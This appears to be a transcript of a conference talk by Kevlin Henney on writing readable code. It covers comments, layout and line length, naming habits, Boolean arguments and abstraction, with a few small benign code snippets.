Is it more empowering mentally to work towards an accommodation of the downsizing and negate? Good grief. You could put this on a PowerPoint slide in a standard business meeting and nobody would notice. It would just slip in there. And the problem here is that we've added more words. We've added longer words. Have we actually added any meaning? No. And this is the problem: we have a lot of habits, and without realizing it, we add noise to the code. So let me take one of those little examples I kind of recycle: a recently used list. A very simple example: a list that holds your recently opened files. So it's a list of strings, but it has a property: items go in at the head, like a stack, but they're also unique, like a set. When you reopen a file you have already opened, it doesn't occur twice; it just goes in once. I use it as a programming exercise. It's a really good little lab. One pair a few years ago produced this C#, and they said, well, we finished the exercise, but we're really not happy with the code. The kind of model answer is about this long. Now, what's interesting is not simply that it takes up half the space, but that when you actually look at the lines of code that do stuff, it's about a third. So if we get rid of all the curly brackets and other spacing forms and declarative noise, then there's a very big difference between the two: five lines versus quite a few more. Imagine this style carried out over a whole code base. It's not the case that the example on the right is easier to read than the one on the left. I want you to think about what happens if you use the same kind of thinking over a whole code base. I've seen those code bases. You're sitting there looking at classes thousands of lines long, and you know that in there somewhere there is a small class struggling to get out, with identical functionality.
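The pair's actual C# isn't reproduced here, but a minimal sketch of the exercise itself, in the spirit of the short model answer, might look like this (names are mine): most recently opened file at the head, no duplicates.

```java
import java.util.ArrayList;
import java.util.List;

// A recently used list: stack-like ordering with set-like uniqueness.
class RecentlyUsedList {
    private final List<String> items = new ArrayList<>();

    void open(String file) {
        items.remove(file); // drop any earlier occurrence (uniqueness)
        items.add(0, file); // newest entry goes in at the head
    }

    String get(int index) {
        return items.get(index);
    }

    int size() {
        return items.size();
    }
}
```

The whole behaviour described, head insertion plus uniqueness, is two lines; everything beyond that in a longer solution is the declarative noise the talk is pointing at.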
Actually, that one's slower than the other one, too. So there is this case: there's so much noise. Which one do you want to work through? It's greater cognitive effort, more cognitive load. One of the most common sources of noise is comments. Thanks to Oracle for this one: all of that, just for Hello World. I love the fact that they list it as a Hello World app. That makes it sound so grand. I used this slide for a couple of years in different contexts, but I realized after a while that when you cut through the noise and look at the one line that actually does something, it's wrong. There's a missing comma. Oh, it's wrong in English, I mean. The Java's fine; you can convince a Java compiler to do anything. The English is wrong. It's missing a comma. It should be Hello, comma, World. This is really important. It's not just trivia; I'm not just picking on minor syntactic points here. There's this classic saying: there's a difference between "let's eat, grandma" and "let's eat grandma". Punctuation saves lives. All of this, and they get the one thing that matters, the real piece of communication to the user, wrong. And you're never going to notice that with all that noise. So, a long time ago when I was first learning C, one of the things given to me was this paper by Rob Pike, Notes on Programming in C. He wrote it in 1989, so I must have read it fairly soon after. There's some really good stuff in here, and a couple of things that definitely show its age, its time and its language. As he says: comments are a delicate matter, requiring taste and judgment. I tend to err on the side of eliminating comments, for several reasons. First, if the code is clear, and uses good type names and variable names, it should explain itself. Now let's turn that around.
He's sort of saying clarity is a consequence. You know, if the code does this, then you shouldn't need comments. Now let's turn it around. Use good type names. Use good names in order that you do not need any auxiliary mechanisms. You may need some, but the idea is: minimize that which the code cannot say. Just get rid of the noise. You may not be able to eliminate it completely, but it should be your goal to rewrite the code so it doesn't need them. Sometimes a very useful technique is to imagine that somebody has removed the commenting feature from the language. How would you write your code then? Okay, for some people, that probably won't make the slightest bit of difference. But for those of you who are here, it will. Think about it. What would you say? Would you say anything differently? Okay, say it like that. And then allow yourself comments back. Is there anything left that you would also like to communicate to the reader? And often it's the stuff that's not obvious. Second, comments aren't checked by the compiler. Actually, quite frankly, they're not checked by the programmer either. So I don't know who the audience is. Yeah? The compiler skips them and programmers skip them. We even use different colors in our IDEs. I've even seen people use white on a white background in order to skip them. Some IDEs come with the ability to fold away the comments, because that's how important they are. So we don't read them. And if you do read them, then it's a bit like reading the instructions. It's a sign of defeat. Yeah? I bought a new Blu-ray player last week. And I strode into the house proudly with this one. None of the cheap ones, only a good one, I said to my wife. Oh. But it's not the most expensive one in the shop. Great. She knows how much the most expensive one is. But it was quite good. And she said, you're not going to look at the instructions, are you? No. Yeah? That's the fact. You can file those away wherever you file them.
I'm going to set this up because I am a programmer. And if it doesn't work, then it's the designer's fault. I got lucky. It worked. So the point is there's no guarantee this stuff is right, as we just saw at the code level. But there's also a visual aspect here, the issue of typography: comments clutter code. I'm going to come back to that visual aspect again in the next item. But I think my favorite piece in this Rob Pike paper was this. And as he says, don't laugh now, wait until you see it in real life. I did laugh. And then five years later, I found it in production code. I just stopped there, and I was reminded: yes, somebody actually wrote this. Absolutely astonishing. If you do not know what this is going to do, you have no business looking at this code. Okay? It's really not your place. Yeah? So we have this other issue. So I tweeted this a while back. It seems to have been retweeted quite a lot. A common fallacy is to assume authors of incomprehensible code will somehow be able to express themselves lucidly and clearly in comments. Think about it, because I've often heard this when we've talked about comments. People say, oh, well, you know, sometimes the code can't be easily understood. So somebody wrote it. Who's going to comment it? The programmer that wrote it. So we're going to get the same person who couldn't clearly express themselves in code to write the comments. I mean, some things are genuinely hard, but quite frankly, most code doesn't fall into that category. And if you can't express yourself fluently in code, it often means that you're on a learning curve. And that's the good bit: it's always nice to be able to look back and go, damn, I was such an idiot. That's great. It shows progress. Either you're on a learning curve or you've flatlined. Your learning curve is dead.
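The "imagine comments were removed from the language" exercise can be sketched like this. The names and the discount rule are invented for illustration, not taken from the talk's slides: the before version narrates mechanics in comments; the after version puts that meaning into names instead.

```java
// A sketch of replacing narrating comments with names that carry the meaning.
public class Comments {
    // Before (typical noisy style, shown here as text):
    //   // check if the customer is eligible for the discount
    //   if (c.getYrs() > 2 && c.getOrd() > 10) { p = p * 0.9; }

    // After: the names say what the comment used to say, so the comment goes.
    static boolean isEligibleForLoyaltyDiscount(int yearsAsCustomer, int ordersPlaced) {
        return yearsAsCustomer > 2 && ordersPlaced > 10;
    }

    static double discounted(double price) {
        return price * 0.9; // 10% loyalty discount
    }

    public static void main(String[] args) {
        double price = 100.0;
        if (isEligibleForLoyaltyDiscount(3, 12)) {
            price = discounted(price);
        }
        System.out.println(price);
    }
}
```

The remaining comment marks the one thing the code cannot say by itself: that 0.9 means a 10% discount.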
That's it. So there is this question. We need to really revisit this stuff. This stuff gets in the way. Now, this kind of suggests that we want to look at other aspects of the code. What I want to look at here is the one that people say, you can't touch that. You can't talk about that, Kevlin. You're going to talk about indentation and spacing. But don't you know that that's not a reasonable conversation that you can have. You will never have a rational conversation about spacing with developers. Just leave that one alone. It's a personal preference. It's untouchable. It's like they're talking about the baby's names or something like that. You just don't go near it. Yeah, that's why I put it number two, not number one. I'm going near it. Right. So, remember this? Remember this? How would a programmer do it? They do it like this. We have a bit of a problem here. We have a bit of a problem. Let me show you the shape of the problem. So, this is slightly beyond HD. HD is 16 to 9 in terms of its ratios. But there are some 21 to 9 screens coming out. And we fall in love with our high resolution monitors and our widescreen monitors. You can actually now project the whole of the Serengeti across your workspace. And it's magnificent. And it's beautiful. And you need a pair of binoculars to see all of the antelope from one side to the other. After a hard day's working, your neck is aching because the code has been going from one end to the other. And this is the problem. This is how many programmers lay out their code. They say, well, that's great because I've got a big screen. We don't need to live in the years of 80 columns and 24 rows anymore. Yeah, yeah. Because we've got better technology. What is this, we? I'm still wearing the same eyes. Actually, they're not, no, they're worse than they used to be. Okay, you still got, we haven't evolved yet. We have not kept up with screen resolutions. Come back in 2000 years. Let's see how we're doing then. 
Probably need another 10 or 20,000 years before it really takes hold. But that's the thing: our ability to perceive has not changed. The bit we can focus on, it's a tiny little bit there. We've got peripheral vision to around there. When you read, if you watch any kind of eye tracking study, it's very interesting. People don't read the way you think they read. And if you have to start moving your head, that's never a good sign. So the problem here is that that's column 80. We get a lot of stuff out here. And I had some very interesting episodes. A couple of years ago, actually, I was here in Oslo, doing a code review with one group. I do strongly recommend doing code reviews on whatever is not your work machine. Because where do we read code? We read code on laptops. That's got an HD resolution. That's fine. Put it on a decent screen, double-headed monitor, no problem. Put it through a projector, though. And there are loads of projectors. I saw a projector the other week that was still at 1024 by 768. Most projectors are sort of 1280 or above. But the point there is: use a projector. And this is exactly what happened. We had two lines of code following each other. And they were identical up until the right hand side of the screen. And the programmer said, oh, yeah, they are actually different. This argument list is quite long. And the method names are quite long. But they differ somewhere around here. And then there's the comment that you always have to chuckle at: it worked on my machine. That's not just about whether it ran on my machine, but actually, does the code look any good? This is another one. I tweeted this a while back and somebody else made the other suggestion. A very good observation; I hadn't really thought about it. But increasingly, I read a lot of stuff on tablets and phones. Try doing a code review. Go to the coffee shop. Take your tablet with you. You'll suddenly say, oh, well, this would be great. Hang on. There it is.
The point there is you need to appreciate how people read. Don't work to one resolution and one idea of how people read. Actually find out how people do read. Turns out they read a lot more like this. I'll give you column 80 rather than column 60. See if you can stick to double digits. I tend to use column 80 as a sort of soft stop. But if I hit three digits, I know something's going wrong. And when I pointed this out to this guy, he said, so you mean 160 is too long? Yeah, I think so. And he looked at this one that was 200. But that's nothing. I visited a company a few weeks ago. And the code was like a graph. If you zoomed out, it was just sort of, but, but, but. So we went out and we found something at column 352. It was a line that went out that far. We were kind of disappointed that there weren't an extra 13 characters to make it up to 365: one column for each day of the year. But the point there is that that's difficult for people to read. Why is this difficult for people to read? How do people lay stuff out? How do people really lay stuff out? Go and pick up a newspaper. Go and look at a website. And you will discover that people do not actually try to use up the whole horizontal space. In fact, they actively seek not to use it. This relates to a point that we need to embrace. It's a thing called clean design, or visual design, basically. Now normally when people think of clean and the word code, they're sort of thinking Uncle Bob and his recommendations. That's great. That's the functional side of it. That's the syntactic, the semantic. But I want to talk about the visual aspect. To answer the question, what is clean design, most succinctly: a clean design is one that supports visual thinking. So this idea of visual thinking, the idea of arrangement so that people can see what's going on. Look at the way that posters are laid out. Look at the way that ordinary web pages are laid out.
And look at the pages that you think are good. Look at the pages that you don't think are good. See how they structure it. It's the same human visual perception system that's responsible for code. So therefore you need to think how somebody is going to read this. So this is the idea. People can meet their informational needs with a minimum of conscious effort and also physical effort. You don't really want to be doing that a lot. You convey information by the way you arrange a design's elements in relation to each other. When you put things above each other, it signifies one thing. When you put things apart from each other, it signifies something else. And this is something important because what you're doing is you're actually showing the reader how to think about something. They're not just looking at the words and the parentheses. You are showing them these ideas are together. These ideas are separate. These ideas follow this idea. That's what you're doing when you lay things out. Now you may not be aware you're doing it, which is where we end up with a slight problem. There's a bit of a gap sometimes. And there is this idea of a term I came across just last month. Structural honesty. Does the structure of your layout, is it honest? Does it convey what you actually are trying to show with the syntax? That's a very interesting idea. So, you know, if the visual relationships are obviously accurate, this is fine. But if they're not, your audience is going to get confused. They will have to examine your work carefully. Now, you may be so proud of your work that you think this is a good thing. I put so much effort into it. Of course, I want people to examine it carefully. Or alternatively, there is, it was hard to write, it's going to be hard to read. Yeah? You've got different ways of coming at this. But I want to talk about this from another point of view. So, the first thing is structural honesty. That's the first requirement. 
Because people normally assume, as I said before, that spacing is somehow a personal or just arbitrary cultural preference. Java programmers do it one way. C sharp programmers do it another. C programmers have half a dozen different ways of doing it. Python programmers have one way of doing it and there is no other. There are lots of different variations. And we assume that these are somehow given and are not open to question. I'm going to question that. I don't think they are a given. So, let's look at some things in terms of visual honesty and visual structuring. So, how not to lay out a method header? I see this so often. It's so common in code. Am I going to blame the Java guys? Yeah, I'm going to blame the Java guys. They do this most. Followed rapidly, hot on their heels, by the C sharp folks. I tend to find this less in other languages. I'm not going to say I don't find it. But in terms of cultural tendencies, the problem with this is that it's about as structurally dishonest as you can get. Because where is the argument list? You're only allowed to use one finger. Ah, see the problem? We have a phrase, an argument list. Okay, where are the parameters? They're in two places, but it's one parameter list. It's on two different sides of the screen. Much more exciting if you've got really long names, because it could be off the screen. So, are you calling that single argument method? Which single argument method? I'm calling the two argument one. No, there's no two argument one here. Well, yeah, there is. Just keep scrolling. Keep scrolling. There it is. The point here is that this is about as dishonest as you can get. It's kind of like, ha ha, fooled you. There's one over here and one over here. So, if I had to pick the worst style, this is probably going to come close to it. I'm not going to tell you what the right style is. I'm going to tell you what the right properties are.
We need to approach any convention that we adopt in terms of requirements, not end user requirements or customer requirements, but requirements. What do we want from a layout? The first thing I want is this idea of visual reasoning and structural honesty. So, if you've got that, that's a good start. So, that suggests you can do it like this, because the arguments are grouped. They are vertically grouped. There is one consistent reading order. Alternatively, horizontally, there is one consistent reading order. I don't care which one you do. You can even try and mix them about a bit. I don't care, but the idea is they both have this property. But there is one to not do. This one is very common. Now, we may say, well, that's fine. I don't see the problem with that, because it's structurally honest. It is structurally honest. Everything is in the right place. The argument list is in one place. It is vertically organized. It has a simple structuring principle. But the problem with this is nothing to do with that. It's to do with the second requirement, which is sustainability. What do I mean by sustainability? Well, let's look at a couple of method calls. Same principle. We have that there. We align it with the opening parenthesis. I'm going to say, do it either like that or like that. There's a couple of other variations. I don't really care, because the one thing that we know happens in code is change. Change is the most common thing. The minute you do a rename, boom, it's wrong. It becomes structurally dishonest. In other words, the reason I don't favor that style is that unless everybody is working with an editor that naturally aligns this, and you're more likely to find that in the Lisp space than you are in the enterprise language space, this first style is doomed to failure. It will never work. That's a very, very grand statement to make. It will never work. Okay, let me put it another way. It will only ever work if nobody ever touches the code. Again, never.
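The sustainability argument can be made concrete with a small, runnable sketch. The method name and values here are invented: the point is that the paren-aligned call only stays honest if every rename re-flows the lines below it, while the single-indent call is unaffected by renames.

```java
// Two call layouts with identical behaviour but different maintenance costs.
public class Alignment {
    static int discountedPrice(int basePrice, int customerTier, int seasonFactor) {
        return basePrice - customerTier * seasonFactor;
    }

    public static void main(String[] args) {
        // Style 1: arguments aligned to the opening parenthesis. Tidy on the
        // day it is written; rename discountedPrice and the alignment below
        // is silently wrong unless someone re-indents every call site.
        int a = discountedPrice(100,
                                2,
                                5);

        // Style 2: a single consistent indent. A rename changes nothing
        // after the first line, so the layout stays honest under change.
        int b = discountedPrice(
            100, 2, 5);

        System.out.println(a == b);
    }
}
```

Both calls compile and run identically; the difference is entirely in how each layout survives the one thing we know will happen to code, which is change.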
In other words, it's one of those techniques that looks right the first time you write it. But from that point on, it's doomed, because the minute that anybody does anything that causes a shuffle, it is unstable. It's unsustainable. I'll leave aside the fact that you end up with this kind of alignment problem where it bounces around the page as you scroll through a file. It's completely arbitrary alignment. It's like rolling dice to figure out which column I should put something in. But that's a personal preference. I want to attack it on the fact that it's just not a workable style. This is the one that upsets people most, I've noticed, whenever I say this. I actually had somebody come up to me afterwards and say, well, I disagree with you. Well, of course you would. You know, get over it. So every time I do a rename, I go through the whole code base to check that everything is still aligned. This is what we call a high maintenance approach. It takes a lot of work. Why do you choose an approach that's difficult to maintain? Do your colleagues also do what you do? And then a dark cloud appeared over his head. No, they don't. And I said, there is the flaw in your otherwise, well, hard-working plan. So the point here is, yeah, it kind of looks pretty the first time you do it, but, you know, we can read anything. Choose something that's easy and sustainable over time. Which means I'm now going to talk about something else to do with spacing. Which is this point about arbitrary alignment positions. So this is formatted according to kind of orthodox Java style. And if we look, we see that there are a number of points of alignment where the eye is drawn. It's drawn to that line. It's drawn to that line. It's drawn to this line. We've got three lines whose only meaning is: we just happen to be here.
And then we've got three lines over here that actually represent logical indentations. So we've got six points of alignment and not very many lines of code. It's quite busy. Okay? Your eye is having to do an awful lot of work. So reduce the number of points of alignment. Stop pushing people out to the right-hand side. Okay? If something's important, it should be on the left. Is the parameter list of a method important? You betcha. It should be somewhere people can read it. It should be either a natural follow on or immediately to the left. People read from the left. Okay? Okay? There are alphabets that don't, but we're talking code here. Pretty much all languages that we're dealing with go from the left. So therefore adjust to what people are doing. Don't maintain a fantasy. Putting your argument lists, putting your arguments over to the right. It's a stupid place to put them if it's off the screen. But we've also got this arbitrary alignment thing. So let's realign it. Well, this is better in one sense because we've now got three points of alignment or three lines of alignment, which is great. There's only one problem. Visually, what does this look like? Well, if you kind of squinted it, actually, I'm not going to, don't worry, don't squint. We'll just replace them all with X's. Let's just get rid of all the punctuation and see what you're actually seeing. Now, I can't tell the difference between the argument list and the first declaration. This style, there's a technical description of it, does not work. Okay? It does not work because visually there is no distinction between two fundamentally different ideas. Here are the parameters to your method and here are your local variables. That's kind of important. Call me a bit old-fashioned. I think that's quite important. So we have a couple of choices. Again, I don't, well, there's more, but again, I don't care which one you choose. You can either sit there and go, whoa, double indentation. Okay? 
Put them somewhere else. That kind of looks okay. It's visually distinct. Alternatively, stop putting your curly brackets in the wrong place. Yes, there is such a thing as a wrong place. It took me 25 years to discover it. I've used all the styles, even some of the crazy ones. I've tried everything, and it turns out there are reasons. I can read all of them, but there are some that actually make more sense, and it's this idea of sustainability and visual design that tips the balance. So that's some food for thought. Let's deal with something slightly less contentious now. Oh, yeah. And of course, that obviously has visual distinction. Let's talk about Lego, because Lego is good. Any excuse to talk about Lego is a good excuse. Except that we have a bit of a problem here. Lego naming. What's Lego naming? Well, Lego naming is where you take parts of Lego. I'll have a kind of a red 2 by 4 and I'll stick that with a kind of a white 2 by 2 and I'll put this together and I will create a name. This is kind of like what my kids used to create, those towers where you're sitting there going, that's going to fall, that's going to fall, and there will be tears. This is how we name things. What's the process? It's called agglutination. In linguistic morphology, agglutination is where you derive complex words by gluing together other words. Some languages do this more than others. Okay? So here's the longest word in the English language. I think it's kind of ironic, because it was invented to be the longest word. Nobody actually uses this, and it's basically made up of Greek and Latin rather than English. So, yeah, not interesting. Here's something closer to home. This is a bit of Norwegian. Yeah, you bet. I'm not going to pronounce it. However, I'm afraid, yeah, you know which language is going to win. Of course, it's German. Although technically this word is no longer a word, because it was retired last year.
It's about 64, 65 characters. It refers to an EU regulation that is no longer an EU regulation. The abbreviation is 12 letters long. But it turns out that even if you can read Norwegian and German, this is not a very natural way of dealing with words. This is too long. You can't grasp it in one go. You have to kind of pause. You will eventually abbreviate it. So what's the problem with our words? Yeah, identifier names. There are even sites that make fun of this whole approach of stacking standard terminology together. There's a method namer and a class namer. You can just go there and refresh the screen and it will give you new class names and method names, just made up of standard parts. What do the standard parts look like? Well, they kind of look like this, you know. It's one of those things. Oh, it's a proxy service manager controller. Factory. Factory. Just remember: for every factory factory you ever create, somewhere on the internet, a kitten dies. Okay? That death is on you. We just take these names. We add them together. We say, oh, look, I'm creating meaning. It's now really meaningful. I refer you back to the Shakespeare example. I've made the name even longer. I've poured more meaning into it. No. What you've done, this is like homeopathy. What you've done is you've diluted the meaning till it's all gone. There is no medicine there. There's only sugar. That's it. It does nothing for you. But does it really take a long name? I mean, sometimes we end up with these names and you're sitting there going, well, I can read all of the parts, but I have no idea what the whole thing means. Yeah, but surely you know what a manager control proxy is. Funny enough, not today. But we've got a factory for one of those. Don't even begin on the name. It tells us something about our coding style as well. It tells us perhaps that we are failing to find the right abstractions, the ideas that name things directly. We often find this as well. There are these naming habits.
It doesn't even have to be long names. So here's one from a piece of client code that I encountered a few months ago, about three months ago. And even at this short length: condition checker, not a long name. Check condition, not a long name. But I was looking at this thing. It's like, condition checker. We've got validators and checkers and all kinds of stuff. And I said, what does the condition checker do? Well, we call it to evaluate a condition. You mean it is a condition? Yeah. And what do you check it for, whether it's true or not? You mean this. Yeah. Oh, that's what it means. That's what it is. It's not a condition checker. There's not some kind of condition sitting out there in a platonic space somewhere, some kind of abstract condition that we have to go out and check for. Is there a fire? The idea is very, very direct. It's a condition. Is it true or is it not? And it's a very simple statement. Now, when you start applying that, it also takes you other places. So here's something. I was going to do this in C sharp. I decided, no, I'm going to put this up in Java, because it allows me to use the throws clause, which is not something I'm a big fan of, but it allows me to cover two things at once. We have a very standard vocabulary. And sometimes people say, oh, it's okay because it's standard. That means I know how to read it. Yes, but the problem is you may not be communicating meaning. So, create connection. That doesn't seem particularly harmful. But how many things do we have that are called create that return something? Do we need the word create on everything that creates a new object? Is that helpful information? Remember, you have a fairly limited bandwidth. There is a reader out there and you have a few characters in which you can say: this is what I want you to notice, and you might not otherwise pick it up.
If you try to tell them absolutely everything, here is a method that uses objects... well, they probably already know that. So don't tell them that bit. Here is a method that's going to return you something that has been created. Okay. But give me a better sense of it. And then we have a habit that I was completely blind to until about 18, 20 months ago. Completely blind to it. We put exception on the end of exceptions in so many cases. This is a very common .NET and Java habit. And I noticed, I was going back to some C++ code and I suddenly thought, why am I not putting the word exception on the end of all the exceptions? And I suddenly realized: because I don't need to. Think about it. So first of all, what are you really doing? You are creating a connection. This is a mechanical description. What is your intention? I am trying to connect to that thing over there. So what we've done is we've ended up doing object-oriented assembler. Instead of saying, I want to connect to that, we've kind of hidden that and said, I'm going to create a connection, rather than stating our intention: I want to connect to that. But if this doesn't work out, I'm going to throw you an exception. What does the exception indicate? It indicates a connection failure. It does not indicate a connection failure exception. Okay. My name is Kevlin Henney. It is not Kevlin FirstName, Henney LastName. Okay. Of course it's an exception. What else could appear in a throws clause? What else could appear in a catch? What else has a name like connection failure? In fact, it's kind of interesting: if you strip that exception off, you can actually find the good exception names. So in the Java library, there is illegal argument exception. If I strip off the exception suffix: illegal argument. That's actually quite meaningful. That's quite a good one. On the other hand, in the .NET library, I find argument exception.
If I strip off the exception, I just get argument. That tells me that we haven't really expressed ourselves. And likewise, in both cases, there's null pointer exception and null reference exception. So when you receive that, that means that something bad happened. What was bad? A null pointer. No, there's nothing wrong with a null pointer. Tell me what was bad. Dereferencing a null pointer. That's bad. So that's what should be in the name of the class. So try that out, you know? You'll probably have stones thrown at you by your colleagues. I recognize that's the harder one to do, but at least state the intention elsewhere. Try and communicate the intention. Don't always talk about the mechanics. So speaking of that, let's talk about abstraction, or lack of it. Under abstraction. So this is a slide that I've used a few times. This is from a blog post by Phil Calçado. It's about five years old. Unfortunately, the blog's gone offline, but you can still find it using the Wayback Machine. And it's a technique that I've encouraged people to use. I actually visited a company last year where all of their projects had tag clouds up on the wall. And the idea is very simple: you get your source code, you strip out all of the comments and all of the string literals, and you push this into something like Wordle or some other tag cloud generator, and you find out what the overall map is of your code. It's a very odd way of looking at code, but we've already looked at code oddly in one sense. I replaced all of the code with Xs. That's a technique I think I picked up from Michael Feathers. There's another technique that I use, which is zooming out. Choose the smallest font size you possibly can and see what the code looks like. It gives you an unusual perspective. Okay? Code is complex stuff. You need more than one point of view.
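The renaming move described here can be sketched in a few lines. The names (`connect`, `ConnectionFailure`) are invented for illustration; the point is that the verb states the intention and the throws clause already says "exception", so the suffix carries no information.

```java
// Intention-revealing names: connect(...) instead of createConnection(...),
// and ConnectionFailure instead of ConnectionFailureException.
public class Connecting {
    // The throws clause and the catch site already tell the reader this is
    // an exception, so the type names only the failure itself.
    static class ConnectionFailure extends Exception {
        ConnectionFailure(String host) {
            super("could not connect to " + host);
        }
    }

    // Before: Connection createConnection(...) throws ConnectionFailureException
    // After: the verb states what we intend; the type states what went wrong.
    static String connect(String host) throws ConnectionFailure {
        if (host == null || host.isEmpty()) {
            throw new ConnectionFailure(host);
        }
        return "connected to " + host; // stand-in for a real connection object
    }

    // Convenience wrapper so callers can probe without handling the checked exception.
    static String connectOrNull(String host) {
        try {
            return connect(host);
        } catch (ConnectionFailure failure) {
            return null;
        }
    }
}
```

Reading a call site aloud makes the difference obvious: "connect, or it throws connection failure" is a sentence; "create connection, or it throws connection failure exception" is bookkeeping.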
This one strips out all of the, well, all of the code structure. We're just left with the names. What does that tell you? Well, in this particular case, it tells us that we really like strings. And lists are quite good as well. And we've got a few integers thrown in for good measure. Wow. So that's what your system does. Your system does strings with a few lists and occasional integers. Gosh, that must be really exciting to work on. Because I work on this system. What do you guys do? Oh, we do stuff with pictures and printing devices and products and paper. Oh. You still got any strings? Yeah, but strings are really small, isn't it? This is the point. We're communicating in the language of the domain. The domain is about these things. We've ended up with object-oriented assembler. We have, without thinking about it, the intelligence that goes on up here, we thought, oh, I can use a string for that. I can convey that using a list. Like, rather than what is it, what is the idea? Shall I name the idea? And using a language, you know, most languages allow you to introduce a name for the idea. So we end up with type names. And so therefore, really enriching that. And that idea sort of riffs off a guideline from Dan North, code in the language of the domain. And I think this is a really interesting example. I really like it because it doesn't use any programmer abbreviations. And yet it's not entirely clear what's going on. The only abbreviation in this piece of code is ID. But that's a real world abbreviation. It's not a programming abbreviation. So every single word there makes sense, but the whole thing doesn't make sense. Should we have a comment? Well, no. This is the whole thing. We have not abstracted enough. To abstract is to remove something. In this particular case, we can actually extract the method, not merely abstract it. And we end up with something that's far more meaningful. All of that mechanics goes away. 
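The extract-method move at the end of that example reads roughly like the sketch below. I am reconstructing it from memory of Dan North's "code in the language of the domain" guideline, so treat the specific names (`portfolioIdsByTraderId`, `canView`) as illustrative rather than a quote from the slides.

```java
import java.util.Map;
import java.util.Set;

// Every word in the raw lookup makes sense; the whole does not. Extracting
// the mechanics behind a domain-language name fixes that.
public class Trading {
    static class Trader {
        final String id;
        final Map<String, Set<String>> portfolioIdsByTraderId;

        Trader(String id, Map<String, Set<String>> index) {
            this.id = id;
            this.portfolioIdsByTraderId = index;
        }

        // Before, at the call site:
        //   if (portfolioIdsByTraderId.get(trader.id).contains(portfolioId)) ...
        // After: the mechanics move down a level and the call site reads
        // in the language of the domain: trader.canView(portfolioId).
        boolean canView(String portfolioId) {
            return portfolioIdsByTraderId
                .getOrDefault(id, Set.of())
                .contains(portfolioId);
        }
    }
}
```

No comment is needed at the call site because the name is the comment: `trader.canView(portfolio)` says exactly what the map-of-sets lookup meant.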
And that's the problem: it's this kind of balance of skill that we have. We care very much about the mechanics, but we also care about the abstraction. Sometimes we get a little confused between the two. We put the mechanics where the abstraction should be. We mix our levels up. That's the intention. Beneath it is the mechanics. And so there's this idea that in anything other than a hundred line script, you really want to start organizing the mechanics away according to intention. When the system gets large enough, even the intention becomes mechanical. So you have another layer. But this is the idea. We have a choice here. And when it comes to code, you have only three ways of expressing yourself effectively: names, spacing, and punctuation. And the language takes care of most of the punctuation. So that's it. That's how you communicate to other people. Of these, the names are the most important. We've also looked at the spacing. These are your only tools. The other thing is to look at things from a different perspective. Let me offer this one. This is one from Gregor Hohpe. It's a very simple idea. What is the perspective we want to encourage people to take? Look at a method from the outside, not just from the inside. We often write our code inside the method. And when we see our parameter names, we see them as well named. We hope. We can see them and there's no problem. They make sense within the body of the method. But what happens when we look at it from the outside and try to use it? Now, if we look at this, we see, you know, parser, yeah, I can understand what that is. Process nodes, yep, that seems to make sense to me. Text, yep, I have no problem understanding that. False. What? I have no idea how that relates to parsers, processing nodes or the text. What does the false mean? Why is it there? What does true do? Okay?
And there is this sense that what somebody has done is they've said there are two options. Now, can I think of a data type that only has two options? Oh, yes. Booleans only have two options. Great, I'll use one of those. And the problem is what is true in this case? I have no idea. There's lots of ways of solving this, but the idea is that on the inside of this, it probably looks quite sensible. You know, maybe it says, is formatted. I can't even remember the example. But in the body of the method, it makes sense. From the outside, true and false make no sense. The most extreme example I know of this was a code review I did a few years ago where there were five arguments that were all Booleans. And on the inside, it looked perfectly sensible, if is enabled and can have logging. Oh, it all looked great. From the outside, true, true, false, false, true. What? There's no kind of sense there. You have to look at it from the outside. But that kind of long argument listing. Keep this in mind. We often under abstract. We end up with these kind of long arguments. Okay? Yeah? Now, different people have different tolerances. I used this quote with a team a couple of years ago. Because I was looking at some code. I said, look, all your constructors have 14 or 15 arguments. And then I used this quote. They seemed unmoved by this. And then one guy piped up and he said, oh, I think I understand the problem. He rummaged through the code, pulled up this thing and put it on the projector. He said, this constructor takes more than 70 arguments. I said, ah, I see the problem. As far as you guys are concerned, when you look at 10, you're thinking, wow, we wish we could have that few. You know? I'm saying it's like a lot and they're thinking, no, no, we aspire to have as little as that. But over the years, when I've retold that story, the record now stands at 326. The guy sent me the diff from the point that it was 325 to 326. You know? We had the conversation that it was 325. 
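The "true/false looks fine on the inside, opaque on the outside" problem has a standard remedy: replace the bare Boolean with a named type. A hedged Python sketch; the `Parser`/`process_nodes`/`Whitespace` names echo the talk's example but the details here are invented:

```python
from enum import Enum

# Boolean-trap version, as seen from the outside:
#   parser.process_nodes(text, False)   # what does False mean here?

class Whitespace(Enum):
    PRESERVE = "preserve"
    COLLAPSE = "collapse"

class Parser:
    def process_nodes(self, text: str, whitespace: Whitespace) -> str:
        # The call site now reads as a sentence instead of a bare flag.
        if whitespace is Whitespace.COLLAPSE:
            return " ".join(text.split())
        return text

parser = Parser()
result = parser.process_nodes("a   b", Whitespace.COLLAPSE)
```

From the outside, `Whitespace.COLLAPSE` explains itself in a way `False` never could.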
He emailed me a few weeks later: and here's me adding another one. That's the point. Statistically, once you hit 10, 10 is as good as 11 is as good as 12. And it will continue on this way. Okay? So, yeah, it's a whole project just to call the method. What are you going to do, spend the sprint calling that method? Good luck with that. We'll see you on the other side. So, abstraction. Abstraction is related to something else. Not whiskey, but it would be nice if abstraction were related to whiskey. That's distillation. That's slightly different. What are we talking about? Unencapsulated state. Specifically, the relationship between this idea of abstraction and encapsulation. If we look at what the dictionary has to offer us: enclose something in, or as if in, a capsule. There's a boundary. There's an inside and an outside. You're hiding something and revealing something else. But there's something else: express the essential features of something simply. This is abstraction: the essence of something. To abstract: what is it? What is it really about? What is the idea of the thing? And: provide an interface for a piece of software to simplify access for the user. Now, this relates to a usability design concept known as an affordance: a quality of an object or an environment which allows an individual to perform an action. So, a knob affords twisting and perhaps pushing, while a cord affords pulling. So, a door that has a pulling thing affords pulling. If it has a little sign that says push, that's bad design. That's like a comment: slash, slash, push. Yeah? We've talked about comments already. This is noise. If you want the user to push, give them a thing that they cannot pull. It's a very simple idea. If you want them to pull, give them a pulling thing. It's very simple. If you want people to use objects in a particular way, then offer them the methods that allow them to do that easily.
